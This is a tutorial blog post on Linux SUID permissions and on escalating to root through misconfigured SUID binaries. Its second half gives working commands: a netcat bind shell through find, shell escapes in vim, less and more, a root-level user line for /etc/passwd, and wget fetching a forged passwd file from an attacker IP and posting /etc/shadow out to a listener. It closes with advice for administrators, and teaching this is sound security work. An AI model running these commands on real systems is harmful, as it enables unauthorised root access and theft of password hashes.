Tuesday, June 18, 2019

Privilege Escalation in Linux using SUID Executables

We all know that a file can have read, write and execute permissions, which we can set using chmod and chown command in Linux. Along with the normal file permissions there are other set of special permissions as well. They are -
Exhibit 1
  • SUID
  • SGID
  • Sticky Bit
  • ACL’s
  • SUDO
  • SELinux

Note: This blog only describes about SUID permissions.

1. What is SUID?


SUID (Set owner User ID) is a special type of file permission given to a file. SUID gives temporary permission to the user and allows user to execute the file/program as the owner rather than the user who runs it.

Sl no.
Description
Permissions

Normal permissions
rwxrwxrwx
2.
SUID with executable permission
rwsrwxrwx
3.
SUID without executable permissions
rwSrwxrwx


Reason to set SUID:

  • Example - We change the password in linux using passwd command, which is owned by the root. When we change our password the passwd command will make some changes in the configuration files such as /etc/passwd or /etc/shadow. Thus a normal user may not have permission to open these files  but the passwd command has. Thus the passwd command is set with suid permission so that it can make changes in other files.

To set SUID for a file:


  • Symbolic way (s, stands for Set) 
    • #Here owner permission execute bit is set to SUID with +s
    • chmod u+s file.txt

  • Numerical/octal way (4)
    • #Here in 4750, four indicates SUID bit set, seven for full permissions for owner, five for read and execute permissions for group, and no permissions for others.
    • chmod 4750 file.txt

To check file is set with SUID bit or not:

  • You can use ls -l to check permission. The x in the owner permission will be replaced by s or S after suid is set.

Capital ‘S’ in File Permission:

  • If you see capital “S”  in the file permission, it means that the file or folder does not have executable permissions for that user on the particular file or folder.

Converting Captial ‘S’ to ‘s’:

  • The following command will set the suid with executable permission.
  • chmod u+x file.txt

Find all SUID Set files in linux:

  • The following command will check all the files with suid bit set(4000).
  • find / -perm +4000


2. Existing Binary utilities with SUID set.

In linux,  we can use some of the existing binaries and utilities to escalate privilege whose suid is set. The known linux executables that can allow privilege escalation are:
  • Nmap
  • Vim
  • Find
  • Bash
  • More
  • Less
  • Nano 
  • Wget #Coolest
  • Cp

Command that will discover all the suid set:


The following commands will find in the / directory owned by the user root, which has suid permission set. It prints them and redirects all the errors to /dev/null to list only the binaries that  the user has permission to access.
  • find / -user root -perm -4000 -print 2>/dev/null
  • find / -perm -u=s -type f 2>/dev/null
  • find / -user root -perm -4000 -exec ls -ldb {} \;

  1. Using NMAP

  • This will work on the older versions of nmap - (2.02 to 5.21), which had an interactive mode.
  • Open terminal and type-
    • Nmap --interactive
    • !sh
  • Rooted!!
  • Metasploit module - exploit/unix/local/setuid_nmap

  1. Using VIM

  • Vim is a text editor. However if it has suid set it will inherit the root permission.
  • Open terminal and type-
    • vim.tiny /etc/shadow #To list the shadow file.
    • #To get shell.
      • Vim.tiny
      • # Press ESC key
      • :set shell=/bin/sh
      • :shell
  • Rooted!!

  1. Using Find

  • Find command is used to discover files stored in the system. However if it has the suid set it will inherit the root permissions as well.
  • Open terminal and type the following-
    • touch <filename>
    • find <filename> -exec whoami \;
    • #To get bindshell-
      • find <filename> -exec netcat -lvp 5555 -e /bin/sh \;
      • netcat <target ip> 5555 #Attacker
  • Rooted!!

  1. Using Bash

  • The following command will open a bash shell as root.
  • Open terminal and type the following-
    • bash -p
  • Rooted!!

  1. Using Less

  • Open terminal and type the following-
    • less /etc/passwd
    • !/bin/sh
  • Rooted!!

  1. Using More

  • Open terminal and type the following-
    • more /etc/passwd
    • !/bin/sh
  • Rooted!!

  1. Using Nano

  • Nano is text editor using this editor u can modify passwd file and add a user in passwd file as root privilege after that u need to switch user. Add this line in /etc/passwd to order to add the user as root privilege.
touhid:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash
  • Open Terminal and type the following:
    • nano  /etc/passwd
    • su touhid #Switching user
  • Rooted!!

  1. Using Wget

  • This is the most coolest way to get root privilege.
  • #Attacker Side-
    • Copy the target’s /etc/passwd file to attacker machine.
    • Modify the file and add a user in it. To add user insert the following line-
touhid:$6$bxwJfzor$MUhUWO0MUgdkWfPPEydqgZpm.YtPMI/gaM4lVqhP21LFNWmSJ821kvJnIyoODYtBh.SF9aR7ciQBRCcw5bgjX0:0:0:root:/root:/bin/bash

    • Host that file using any web server. 
      • For ex. Using python- python -m SimpleHTTPServer 8000
  • #Victim Side-
    • wget http://192.168.56.1:8080/passwd -O /etc/passwd
    • su touhid # Switching User
  • To dump the shadow file:
    • sudo wget --post-file=/etc/shadow 192.168.56.1:8080
    • Setup Listener on attacker : nc –lvp 8080
  • Rooted!!

  1. Using Copy

  • Open terminal and type the following:
    • cp /etc/passwd /var/www/html
    • Add a new line for new user.
    • Cp passwd /etc/passwd
    • Change user
  • Rooted!!
Thus misconfigured SUID can be used to escalate privileges. Therefore administrator should evaluate all the SUID binaries and whether they need to run with the permissions of an elevated user. Particular focus should be given to applications with the ability to execute code or write arbitrary data on the system.

References

https://www.linuxnix.com/suid-set-suid-linuxunix/
https://pentestlab.blog/category/privilege-escalation/